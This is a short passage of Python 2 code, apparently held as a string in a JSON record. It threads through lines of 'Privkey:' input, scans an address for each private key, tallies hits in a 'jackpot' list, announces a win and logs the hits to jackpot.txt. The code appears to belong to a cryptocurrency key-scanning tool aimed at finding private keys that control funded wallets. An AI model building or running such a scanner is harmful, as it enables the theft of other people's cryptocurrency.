line.startswith(\"Privkey: \"):\n\t\tt = Thread(target=scan, args=(addr,line[9:]))\n\t\tthreads.append(t)\n\t\tt.start()\n\t\tsleep(1)\n\t\tn+=1\n\t\tprint str(n)+\" \"+str((n*3)-2)+\" \"+str(len(jackpot))\n\n#[x.join() for x in threads]\n\nif len(jackpot)>0:\n\tprint \"\\n---------------------------\\nYou WIN THIS JACKPOT! \"+ str(len(jackpot))\n\t\ntry:\n\t# This tries to open an existing file but creates a new file if necessary.\n\tlogfile = open(\"jackpot.txt\", \"a\")\n\ttry:\n\t\tfor j in jackpot:\n\t\t\tlogfile.write(j)\n\tfinally:\n\t\tlogfile.close()\nexcept IOError:\n\tpass\n" } ]
2